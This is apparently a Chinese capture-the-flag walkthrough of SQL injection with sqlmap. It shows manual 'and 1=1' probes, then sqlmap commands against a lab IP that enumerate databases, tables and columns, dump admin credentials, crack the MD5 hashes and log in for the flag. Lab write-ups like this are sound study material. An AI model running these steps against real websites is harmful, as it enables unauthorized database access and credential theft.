sqlmap注入图文详解
更新时间:2021年08月11日 15:18:43 作者:徐林2333
sqlmap 是一个自动SQL 射入工具。本文收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,希望能给你带来帮助
1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。
地址栏输入 and 1=1 发现页面正常显示。
再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞
2.现在拿出我们的kali工具,sqlmap进行注入测试。
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs
3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables
4.接下来查一下member中存在哪些列。
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns
5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。
6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里
7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。
8.END 登录成功,拿到flag,提交。Gameover !
总结
本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注脚本之家的更多内容!
相关文章
这篇文章主要给大家介绍了关于mysql学习之引擎、Explain和权限的相关资料,文中通过示例代码将引擎、Explain和权限介绍的非常详细,对大家学习或者使用mysql具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2018-06-06
MySQL已经成为世界上最受欢迎的数据库管理系统之一,无论是用在小型开发项目上,还是用在构建那较大型的网站,MySQL都用实力证明了自己是一个稳定、可靠、快速、可信的系统,足以胜任任何数据存储业务的需要。本文总结了MySQL的使用规范2020-09-09
MySQL性能参数详解之Skip-External-Locking参数介绍
MySQL的配置文件my.cnf中默认存在一行skip-external-locking的参数,即跳过外部锁定。根据MySQL开发网站的官方解释,External-locking用于多进程条件下为MyISAM数据表进行锁定2016-05-05
根据要求配置MySQL主从备份、读写分离,结合网上的文档,对搭建的步骤和出现的问题以及解决的过程做了如下笔记2012-03-03
这篇文章主要介绍了Mysql如何查询锁表问题,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教2023-07-07
大家好,本篇文章主要讲的是全面盘点MySQL中的那些重要日志文件,感兴趣的同学快来看一看吧,对你有用的话记得收藏,方便下次浏览2021-11-11
这篇文章主要介绍了mysql 正则表达式查询含有非数字和字符的记录的相关资料,需要的朋友可以参考下2016-12-12
针对十亿级MySQL大表的查询优化,本文主要介绍了10种经过验证的核心优化策略及对应SQL实现方案,具有一定的参考价值,感兴趣的可以了解一下2025-03-03
这篇文章主要介绍了mysql 数据库链接状态确认实验,通过本文我选择 了三种方案给大家详细讲解,结合实例代码给大家介绍的非常详细,需要的朋友可以参考下2022-09-09
随着您的应用程序或网站的增长,您可能会发现已经超出了当前的设置,如果您目前将 Web 服务器和数据库后端托管在同一台 VPS 上,一个好主意是将这两个功能分开,以便每个功能可以在自己的机器上运行和增长,在本指南中,我们将讨论如何配置一个远程数据库服务器2024-11-11
最新评论